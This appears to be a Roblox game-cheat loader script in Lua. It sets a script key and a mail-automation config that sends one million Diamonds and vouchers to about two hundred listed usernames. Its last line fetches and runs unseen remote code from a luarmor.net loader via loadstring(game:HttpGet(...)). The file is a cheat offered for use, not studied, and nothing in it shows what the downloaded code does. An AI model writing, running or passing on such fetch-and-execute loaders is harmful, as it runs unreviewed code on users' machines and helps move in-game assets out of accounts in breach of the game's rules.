script_key = "bSdJMZGmgbmiNOeWrtXQAwcHwiVDAieg";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
    ["Diamonds"] = {Class = "Currency", Id = "Diamonds", Amount = "1000000"},
    ["Daycare Slot Voucher"] = {Class = "Misc", Id = "Daycare Slot Voucher", Amount = 20},
}
_G.GMAIL_RECEIVERS = {
    "hakoher23",
    "naruto3434066",
    "saasuke2323",
    "emnholam232",
    "tieuxenh2323",
    "xenhquadi232",
    "bemuoi2323",
    "tieuxanh322",
    "banhbo22323",
    "kkimcuong22",
    "vangne2323",
    "hugyesrr22",
    "rranh231",
    "anhba23122",
    "pghonm2323",
    "phome3213",
    "phone232373",
    "dienthoai23434",
    "vnvodich2137",
    "woir933",
    "banhbonghi213",
    "bongda23123",
    "danh23a23",
    "anh3423563",
    "mminh23431",
    "minhha2375",
    "tiengst21332",
    "sattghuon344",
    "anhbietma727",
    "tinhlo9872",
    "anhbkeysai87",
    "kobakobon866",
    "luadaovinh7u7",
    "baylennao876",
    "phimtinhcam76",
    "batman987225",
    "vinhdanh0908",
    "depmatchua56",
    "bikipluyenronf7",
    "anhsairoi92ww",
    "anhbabao8272",
    "hetthatroi222",
    "beiuoi73737",
    "chabanba772",
    "baanhem766",
    "bayvabon97",
    "huquadi945",
    "bebanh8666",
    "anhhhqua765",
    "tungtinh827w",
    "anhsayqua755",
    "gianhi8666",
    "shinnhoba7722",
    "thathhqua72",
    "denthenhi28w",
    "banhbeoe8w",
    "mahmenhe827w",
    "canhba872",
    "motnhatba822",
    "banhbeovo282",
    "huavanba8282",
    "kebachung8w",
    "hupmanhthoi282",
    "connhome87w",
    "motongba8w8",
    "namanhenw82",
    "manhmenhe22",
    "bamanhlam282",
    "thatraanh8262",
    "hocttro383",
    "7acanhee",
    "anhbatia2828",
    "hashas2325",
    "hascunh2323",
    "cungtern34",
    "banch3434",
    "vaithatra2323",
    "chungtatung123123",
    "thatrasao2332",
    "chuangtianh223",
    "changbietgidsd",
    "hahahcuodoi",
    "chanbgrao23",
    "tinhsd3434",
    "thatras34234",
    "tinhbt34234",
    "ghung3432",
    "vaiu23dinh",
    "anhtinh213123",
    "bacthat231",
    "bachaa34324",
    "hinhnhu54t645",
    "chagt2311",
    "saonhgi4534",
    "thanhw3232",
    "traianh343",
    "ghym31223",
    "thatnha232",
    "kbjty2311",
    "anhla23237",
    "anht632434",
    "saoko3432",
    "banlagh333",
    "kosaomas234",
    "bachey33434",
    "anhuinbh444",
    "12anh233",
    "53anhem",
    "tinhtanh444",
    "xetankj2343",
    "anhbjt3433",
    "saoznha2",
    "nhanh2211a",
    "anhnha2324",
    "33anha2342",
    "nhutanh3434",
    "hoanghba33",
    "babane5457",
    "rasnh231",
    "tinbhtay34",
    "anhchag233",
    "dgtc2132",
    "abyed2231",
    "asa2f22",
    "fff22anhhu",
    "gainha23123",
    "danhthap2332",
    "vungtay2312",
    "anhbjt2323",
    "chuoyt23423",
    "ran202509",
    "hopviy23123",
    "a22bea232",
    "babytrill45",
    "taaall345ss",
    "beba232319",
    "anhnunh211",
    "banhkem3838",
    "huavannam2838",
    "tienkoco3883",
    "eresnha8w8",
    "badonxue88e",
    "chungtala8282",
    "nhotuoima8w8",
    "bamakinh828w",
    "dinhoang21q3",
    "thianh23a2",
    "anhba21313",
    "nhanghowe232",
    "thanhtanh23",
    "maubanh232",
    "b32anh21312",
    "saumui324",
    "anhynh232",
    "trunbgsy3434",
    "ranhqynh2323",
    "anhbast21311",
    "satthuomh3434",
    "anhinh343",
    "ninhtnh232",
    "anhvy2332",
    "thathet23123",
    "tlingh232",
    "hettnh232",
    "banah23235",
    "kimxa233",
    "bnhmero23",
    "thanhnhanh232",
    "hanha2323",
    "yeuyem23",
    "vanhe2323",
    "anhhyng123",
    "anhntnh22",
    "anhthat2312",
    "ngokqua23",
    "baynh2321",
    "baytrat23",
    "anhbay3434",
    "tynhat112",
    "rnanh232",
    "rannhe123",
    "nbanh2323",
    "banh234aa",
    "huaanh23",
    "anhbynh2",
    "lih23aa2",
    "banhlinh23",
    "anhlongh1236",
    "lonbgk23",
    "anhen22312",
    "eren4545297",
    "ranhtynh123",
    "tinhyeu2323",
    "asssoin23",
    "sieiutyh3434",
    "shunh23123",
    "shibaz2323"
}
 
_G.GMAIL_DELAY  = 3
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
